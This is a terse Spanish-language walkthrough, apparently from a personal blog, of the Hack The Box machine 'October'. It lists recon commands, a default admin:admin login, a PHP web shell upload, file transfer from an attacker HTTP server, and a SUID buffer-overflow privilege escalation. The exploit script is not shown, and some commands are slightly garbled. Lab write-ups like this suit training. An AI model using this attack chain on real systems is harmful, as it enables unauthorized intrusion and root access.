Cu3rv0x
October

October


HTB Windows

nmap -A -p- -oA october 10.129.202.91 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA october 10.129.202.91

nmap -sU -O -p- -oA october-udp 10.129.202.91

nikto -h 10.129.202.91:80

ssh_command.

whatweb 10.129.202.91

ssh_command.

ssh_command.

http://10.129.202.91/backend

credenciales admin:admin

ssh_command.

Subimos archivo shell.php.php5 en media

ssh_command.

Le damos click a click here

ssh_command.

ssh_command.

Vemos ./usr/local/bin/ovrflw

find -perm -4000 2>/dev/null

ssh_command.

ssh_command.

git clone https://github.com/logld/peda

ssh_command.

tar -zcvf peda.tar peda

ssh_command.

python3 -m http.server 8888

wget http://10.10.14.125:8888/peda.tar

ssh_command.

tar -xf peda.tar

ssh_command.

export HOME=/tmp

echo “source ~/peda/peda.py” >> ~/.gdbinit

ssh_command.

pattern_create 500

r ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaAAA’

ssh_command.

pattern_offset 0x41384141

ssh_command.

which ovrflw | xargs ldd

ssh_command.

Creamos un script en python.

ssh_command.

ssh_command.

for i in $(seq 1000); do ldd /usr/local/bin/ovrflw | grep libc | awk ‘NF(print $NF}’ | tr -d ’()’; done | grep “0xb755a000”

ssh_command.

ssh_command.

python3 exploit.py

ssh_command.

© 2025 Cu3rv0x